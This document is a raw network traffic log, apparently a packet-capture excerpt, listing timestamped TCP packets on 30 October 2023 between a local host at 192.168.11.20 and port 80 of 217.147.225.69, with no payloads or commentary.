                                                                                                                                                                                        Oct 30, 2023 14:17:51.134279013 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.134371996 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.134438038 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.134474993 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.134541988 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.134543896 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.134623051 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.134651899 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.134716988 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.134763002 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.134824038 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.134865046 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.134913921 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.134970903 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.135018110 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.135070086 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.135122061 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.135164022 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.135240078 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.135293007 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.135314941 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.135350943 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.135407925 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.135430098 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.135484934 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.135540009 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.135610104 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.135643005 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.135705948 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.135715961 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.135770082 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.135822058 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.135890961 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.135910034 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.135999918 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.136037111 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.136100054 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.136154890 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.136161089 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.136249065 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.136316061 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.136373043 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.136389971 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.136430025 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.136486053 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.136503935 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.136564016 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.136609077 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.136656046 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.136709929 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.136759996 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.136802912 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.136866093 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.136888027 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.136967897 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.136981964 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.137065887 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.137099028 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.137155056 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.137175083 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.137226105 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.137280941 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.137343884 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.137371063 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.137434959 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.137465954 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.137548923 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.137553930 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.137644053 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.137643099 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.137706995 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.137748957 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.137814999 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.137836933 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.137904882 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.137929916 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138008118 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138019085 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138103962 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138139009 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138195992 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138216019 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138294935 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138314009 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138362885 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138381004 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138387918 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138408899 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138428926 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138447046 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138465881 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138467073 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138465881 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138494015 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138514042 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138535976 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138554096 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138582945 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138628006 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138645887 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138700962 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138755083 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138792038 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138792038 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138869047 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138889074 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138935089 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.138969898 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.139025927 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.139027119 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.139118910 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.139123917 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.139225006 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.139244080 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.139298916 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.139386892 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.139389992 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.139389992 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.139497042 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.139517069 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.139532089 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.139597893 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.139650106 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.139650106 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.139774084 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.139816999 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.139839888 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.139859915 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.139877081 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.139965057 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.139965057 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140010118 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140010118 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140012980 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140049934 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140074015 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140093088 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140145063 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140145063 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140192032 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140219927 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140242100 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140270948 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140294075 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140379906 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140379906 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140413046 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140470028 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140475035 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140530109 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140548944 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140572071 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140620947 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140635014 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140676022 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140676022 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140750885 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140793085 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140845060 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140897036 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140897036 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.140971899 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.141094923 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.141141891 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.141141891 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.141141891 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.141154051 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.141226053 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.141247988 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.141377926 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.141382933 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.141503096 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.141522884 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.141592026 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.141634941 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.141652107 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.141652107 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.141663074 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.141732931 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.141778946 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.141794920 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.141794920 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.141804934 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.141881943 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.141891956 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.141891956 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.141941071 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.141971111 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.142024994 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.142045021 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.142066956 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.142102003 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.142118931 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.142170906 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.142170906 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.142231941 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.142268896 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.142271042 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.142297029 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.142405033 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.142453909 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.142482042 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.142527103 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.142545938 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.142627954 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.142640114 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.142640114 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.142735958 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.142772913 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.142821074 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.142887115 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.142905951 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.142925024 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.142992020 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.143011093 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.143068075 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.143098116 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.143132925 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.143132925 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.143249989 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.143273115 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.143388033 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.143407106 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.143431902 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.143486023 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.143536091 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.143536091 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.143596888 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.143640041 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.143657923 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.143758059 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.143779993 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.143805981 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.143898964 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.143918037 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.143935919 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.143969059 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.143978119 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144030094 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144031048 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144105911 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144125938 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144129038 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144129038 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144237041 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144237041 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144272089 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144296885 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144344091 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144413948 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144421101 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144421101 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144479990 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144517899 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144524097 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144566059 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144628048 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144630909 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144655943 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144680023 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144736052 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144754887 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144783974 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144783974 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144855976 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144926071 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.144977093 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.145019054 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.145024061 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.145138979 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.145186901 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.145220995 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.145291090 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.145340919 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.145382881 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.145405054 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.145469904 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.145550966 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.145602942 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.145617008 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.145654917 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.145673990 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.145716906 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.145745993 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.145793915 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.145795107 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.145880938 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.145891905 CET5009380192.168.11.20217.147.225.69
